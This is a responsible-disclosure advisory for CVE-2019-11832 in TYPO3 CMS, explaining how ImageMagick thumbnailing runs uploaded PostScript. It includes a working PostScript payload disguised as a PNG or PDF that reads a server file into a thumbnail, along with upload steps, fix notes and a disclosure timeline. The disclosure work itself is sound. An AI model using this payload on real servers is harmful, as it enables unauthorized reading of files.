CVE-2019-11832

The following (slightly modified) advisory was sent to the TYPO3 security team (security@typo3.org) on 28th January 2019.

The final security patch was released on 7th May 2019 in TYPO3 release 9.5.6 / 8.7.25, a SA from TYPO3 can be found here: https://typo3.org/security/advisory/typo3-core-sa-2019-012/.

Background

In January 2019 @jensvoid held a lecture at Ruhr-University Bochum about his PostScript related research and how to pwn the web using this ancient language. After his talk I did some private research - and stumbled over the following security issue in TYPO3.

Advisory

It has been discovered, that TYPO3 CMS is vulnerable to arbitrary code execution using PostScript.

• Affected Versions <= 9.5.5

Problem Description

PostScript is a turing complete page description language. Due to the use of ImageMagick, an attacker is able to upload PostScript files (covered as PNG or PDF file). As a result, he is able to execute arbitrary PostScript Code.

Technical details

When creating Thumbnails using ImageMagick methods, the library itself determines the format of the input, which may vary from the developer’s expectation. As it is in the nature of PostScript, it has to be interpreted in order to print the contents of a file. As a result, if the attacker manages to pass PostScript to ImageMagic, his code is executed on the webserver.
In the following examples the rendered preview of files in the backend is used to demonstrate the vulnerability.

Steps to reproduce

0) Setup

1. Make sure GhostScript is installed on the webserver

apt update && apt install ghostscript

2. Check TYPO3 Configuration at “Environment” > “Image Processing”, make sure the “Read pdf” section does not show any errors.
3. Create a file at /tmp/secret.txt in order to demonstrate code execution and file inclusion later on
4. We use the following file for our test. IMPORTANT: Save it with .pdf and .png as file extension!

Disclaimer: The following PS code was modified from https://lamehackersguide.blogspot.com/2017/02/weaponizing-postscript.html

%!PS
/infile (\/tmp\/secret.txt) (r) file def  % open file
/buff 128 string def                      % buffer for reading
/Courier 30 selectfont                    % name and size of font
/LM 10 def                                % x coord
/ypos 700 def                             % y coord
LM ypos moveto
{ % loop
  infile buff readstring                  % read chars to the buffer
  { %ifelse
    buff cvs show                         % write the chars to the document
  }{ %else
    buff cvs show
    infile closefile                      % close file pointer
    exit                                  % exit the loop
  } ifelse
} bind loop

showpage

1) Filelist Module

1. Upload the test file attached (or embedded above) via file upload in the File List Module
2. Display details - there should be rendered preview thumbnail
3. The thumbnail contains the contents from /tmp/secret.txt

2) Content Elements

1. Create a new content element (type: “Text & Media”)
2. Upload the test files to the content element
3. Display rendered thumbnail

3) 3rd party extensions

Potentially every third party extension that enables file uploads and/or renders this kind of thumbnails in the backend or frontend may be vulnerable. File uploads in forms may increase the attack surface to non-authenticated users.

Fix

The ImageMagick wrapper has to handle the inputs carefully, and must not pass unsafe PostScript to the ImageMagick layer. This functionality seems to be implemented in TYPO3\CMS\Core\Imaging\GraphicalFunctions.php.
In addition to that, GhostScript (which is used by ImageMagick internally) MUST run sandboxed.

Hint: The actual patch can be reviewed in this commit: https://github.com/TYPO3/TYPO3.CMS/commit/e845d90b82b2f72ab12a9e37f15082297832beca

Further Reading

The severity could become even higher, as in the last months several GhostScript CVEs appeared and there is active research in this field. E.g:

• Privilege Escalation using PostScript in GhostScript: CVE-2018-19409
• For further reading on PostScript: https://hacking-printers.net/wiki/index.php/Main_Page
• Awesome resources on hacking the web using PostScript (@jensvoid): https://www.springerprofessional.de/en/postscript-undead-pwning-the-web-with-a-35-years-old-language/16103774

Responsible Disclosure

TYPO3 core member Oliver Hader (@ohader) received this advisory and fixed the security flaw.

• 28th January 2019: Initial Report to security@typo3.org
• 28th January 2019: First response by Oliver Hader security@typo3.org, Ticket#201901285760000013, follow-up questions
• 28th January 2019: Follow-up questions are answered.
• 30th January 2019: Oliver Hader security@typo3.org: Investigations on Image Magick Policies
• 15th February 2019: Follow-up Information and more test cases are sent to security@typo3.org
• 18th March 2019: Heads-up, question current status
• 18th March 2019: Oliver Hader security@typo3.org: Patch is currently reviewed and tested, O.H. asks for my Github account.
• 10th - 12th April: Oliver Hader security@typo3.org provides patch file which is reviewed and the patch is successfully retested
• 7th May 2019: TYPO3 Security Update is released: https://github.com/TYPO3/TYPO3.CMS/releases/tag/v9.5.6

• PostScript
• TYPO3